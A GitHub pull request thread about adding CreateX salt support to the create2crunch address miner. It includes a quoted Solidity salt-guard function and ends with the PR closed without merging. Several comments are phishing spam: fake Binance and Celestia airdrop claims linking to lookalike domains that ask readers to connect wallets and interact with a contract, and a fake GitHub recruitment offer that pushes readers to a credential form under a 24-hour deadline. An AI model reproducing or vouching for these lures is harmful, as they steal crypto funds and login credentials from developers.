### PR TITLE
Add support for CreateX salts

### PR DESCRIPTION
**Pull request by Vectorized**
For https://github.com/0age/create2crunch/issues/17.

vectorized/create2crunch/createx -> DaniPopes/create2crunch/modernize -> 0age/create2crunch/master

@pcaversaccio @mds1  @0age 

Not sure if 88 bits of randomness is enough for super hardcore mining tho. Should be.

### CODE REVIEW

**Review by pcaversaccio — COMMENTED** [review]
So `CreateX` provides overall 5 variations on how you can correctly configure the `salt`:
1. Configure a permissioned deploy protection as well as a cross-chain redeploy protection.
2. Configure solely a permissioned deploy protection.
3. Configure solely a cross-chain redeploy protection.
4. No `salt` value configuration, i.e. just use a randomly chosen `salt` value.
5. Let the `salt` value be generated randomly.

The full logic can be seen here:

```solidity
function _guard(bytes32 salt) internal view returns (bytes32 guardedSalt) {
  (
    SenderBytes senderBytes,
    RedeployProtectionFlag redeployProtectionFlag
  ) = _parseSalt({ salt: salt });

  if (
    senderBytes == SenderBytes.MsgSender &&
    redeployProtectionFlag == RedeployProtectionFlag.True
  ) {
    // Configures a permissioned deploy protection as well as a cross-chain redeploy protection.
    guardedSalt = keccak256(abi.encode(msg.sender, block.chainid, salt));
  } else if (
    senderBytes == SenderBytes.MsgSender &&
    redeployProtectionFlag == RedeployProtectionFlag.False
  ) {
    // Configures solely a permissioned deploy protection.
    guardedSalt = _efficientHash({
      a: bytes32(uint256(uint160(msg.sender))),
      b: salt
    });
  } else if (senderBytes == SenderBytes.MsgSender) {
    // Reverts if the 21st byte is greater than `0x01` in order to enforce developer explicitness.
    revert InvalidSalt({ emitter: _SELF });
  } else if (
    senderBytes == SenderBytes.ZeroAddress &&
    redeployProtectionFlag == RedeployProtectionFlag.True
  ) {
    // Configures solely a cross-chain redeploy protection. In order to prevent a pseudo-randomly
    // generated cross-chain redeploy protection, we enforce the zero address check for the first 20 bytes.
    guardedSalt = _efficientHash({ a: bytes32(block.chainid), b: salt });
  } else if (
    senderBytes == SenderBytes.ZeroAddress &&
    redeployProtectionFlag == RedeployProtectionFlag.Unspecified
  ) {
    // Reverts if the 21st byte is greater than `0x01` in order to enforce developer explicitness.
    revert InvalidSalt({ emitter: _SELF });
  } else {
    // For the non-pseudo-random cases, the salt value `salt` is hashed to prevent the safeguard mechanisms
    // from being bypassed. Otherwise, the salt value `salt` is not modified.
    guardedSalt = (salt != _generateSalt())
      ? keccak256(abi.encode(salt))
      : salt;
  }
}
```

As you can see, the `salt` value modification undergoes different additional hashing logic depending on the chosen configuration. This is not reflected in this PR. For example, the current library always assumes the frontrunning protection, which can be disabled in `CreateX` and thus any value for the 21st byte is valid. So my question is: what should be the scope of this PR overall?

Two further questions (since it will get merged into the `modernize` branch):
- Should we extend the logic of the library to match cases like `ba5edXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXba5ed` (see for example the `CreateX` factory address ;)). Of course, this would change the original vision of solely focusing on efficient Ethereum addresses, but might be a cool feature.
- Should we also provide a utility for `zksync` addresses? As you know, the `CREATE2` logic is different there (see [here](https://github.com/matter-labs/era-system-contracts/blob/d42f707cbe6938a76fa29f4bf76203af1e13f51f/contracts/ContractDeployer.sol#L89-L110)). I can help to connect with the zkSync guys and maybe they can spin up a PR for their case.

Let me know your thoughts.

**Comment by Vectorized** [comment]
Don't merge this PR. It isn't compatible with the double-hashing of CreateX.

It's gonna be really hard to add it. 

Maybe it would be better to have a CreateXCrunch repo.

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by pcaversaccio** [comment]
> Maybe it would be better to have a CreateXCrunch repo.

I'm fine with that as well! Does anyone have the bandwidth to support building this?

**Comment by freshy969** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!sch17, @Trackerming, @rohitasb, @thebor1337, @Majchrzak, @andrejrakic, @royswale, @vacekj, @Mattiatore, @0xJchen, @JackG-eth, @serdargkaya, @ackintosh, @storming0x, @huynhnhathao, @bbenzikry, @highskore, @cawfree, @ayush-3516, @shouc

**Comment by wsdevprogrammer** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!33799, @Omni-Engineering, @prem5656, @avinesmaeilpour, @puddingmow, @Ivothoughts, @MOZGIII, @mark-twan, @alihamde92, @rabbym45, @Lakhdar47120, @Rubelhossaon122, @Rasteams, @sambokanku, @Yassineakdahe, @brunolber, @boytembikai7788, @maintainvalues, @lewixlabs, @ghostsmoke94

**Comment by wsdevprogrammer** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
amostaghel, @Lz1y, @ChrisTorresLugo, @mehmetfg, @teimichael, @3milk, @DioPires, @SYCP-dot, @mmm5609, @chertpong, @tomeq93, @GemsGame, @tsalvatore, @ethandaya, @terrycryptocom, @snd, @wpank, @d5c5ceb0, @nflaig, @eos21

**Pull request closed without merging**
